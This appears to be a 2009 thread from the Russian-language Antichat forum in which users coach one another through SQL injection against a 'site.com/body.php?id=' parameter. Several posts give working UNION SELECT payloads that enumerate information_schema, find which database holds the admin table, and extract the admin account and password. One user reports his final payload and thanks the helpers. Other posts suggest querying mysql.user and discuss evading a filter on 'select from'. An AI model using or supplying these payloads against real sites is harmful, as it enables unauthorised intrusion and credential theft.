ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #7761  
Старый 20.06.2009, 20:54
R1dex
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865

Репутация: 571
Отправить сообщение для R1dex с помощью ICQ
По умолчанию

В какой бд таблица admin?
 
Ответить с цитированием

  #7762  
Старый 20.06.2009, 20:55
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

2 Adm1n4eG
try

http://site.com/body.php?id=-1+union+all+select+1,2,3,concat(0x3a,table_name,0x 3a,table_schema),5,6,7,8+from+i nformation_schema.tables+limit+1,1--
 
Ответить с цитированием

  #7763  
Старый 20.06.2009, 20:57
R1dex
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865

Репутация: 571
Отправить сообщение для R1dex с помощью ICQ
По умолчанию

Тогда уж лимит+17,1

Adm1n4eG, вот, читай: http://forum.antichat.ru/thread104591.html

Читай там вопрос номер 3.
 
Ответить с цитированием

  #7764  
Старый 20.06.2009, 20:57
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

Тебе же сказали:

1. http://site.com/body.php?id=-1+union+all+select+1,2,3,count(*),5,6,7,8+from+adm in--

- подсчитает колв-во записей в админ, если ноль - то чего вы хочите, как грица

2. . http://site.com/body.php?id=-1+union+all+select+1,2,3,table_schema+from+informa tion_schema.columns+where+table_name=0x61646d696e

- узнай точную БД, где находится табла admin, может просто не в текущей БД, а потом делай запросы подставляя сначала название_бд.admin

3. unhex(hex(данные)), aes_decrypt(aes_encrypt(данные)) - просто несповпадение кодировок, в общем проверяй

4. Просто нет прав на чтение данной таблицы у текущего юзера

Последний раз редактировалось Pashkela; 20.06.2009 в 21:13..
 
Ответить с цитированием

  #7765  
Старый 20.06.2009, 21:32
Adm1n4eG
Познающий
Регистрация: 27.03.2009
Сообщений: 40
Провел на форуме:
1191962

Репутация: 39
По умолчанию

Тож забыл сразу сказать в таблице admin есть 2 колонки account и pwd но почему то при проверке count(*) все равно появилась ошибка...

R1dex большое спасибо!!!

Цитата:
Adm1n4eG, вот, читай: http://forum.antichat.ru/thread104591.html
Читай там вопрос номер 3.
эт я както упустил )))
все таки оказалось что таблица находится не в той базе с которой работает скрип
проверил это таким образом:

Цитата:
http://site.com/body.php?id=-1+union+select+1,2,3,table_schema,5,6,7,8+from+inf ormation_schema.tables+where+table_name=0x61646d69 6e--
Запрос выдал: bwbvdisk

Итоговый запрос и получение админского логина и пасса:
Цитата:
http://site.com/body.php?id=-1+union+all+select+1,2,3,concat_ws(char(58),accoun t,pwd),5,6,7,8+from+bwbvdisk.admin+limit+0,1--
Всем кто помогал спс!
 
Ответить с цитированием

  #7766  
Старый 20.06.2009, 23:03
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию

Цитата:
подсчитает колв-во записей в админ, если ноль - то чего вы хочите, как грица
ну вообще если в таблице нет ниодной записи ошибки не будет, а на страницу выведуться null'и
пробуй select user from mysql.user limit 9999999
 
Ответить с цитированием

  #7767  
Старый 21.06.2009, 01:51
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161

Репутация: 142


Отправить сообщение для Велемир с помощью ICQ
По умолчанию

Можно ли в подзапросах обойтись без использования from? Union фильтруется,как и from
 
Ответить с цитированием

  #7768  
Старый 21.06.2009, 01:52
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

нет, искать обход фильтра
 
Ответить с цитированием

  #7769  
Старый 21.06.2009, 01:55
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161

Репутация: 142


Отправить сообщение для Велемир с помощью ICQ
По умолчанию

какой обход? фильтрация всей конструкции select from
 
Ответить с цитированием

  #7770  
Старый 21.06.2009, 01:57
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161

Репутация: 142


Отправить сообщение для Велемир с помощью ICQ
По умолчанию

Если встречается select from подряд,то форбидн.А вот если from select или отдельно,то нет.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ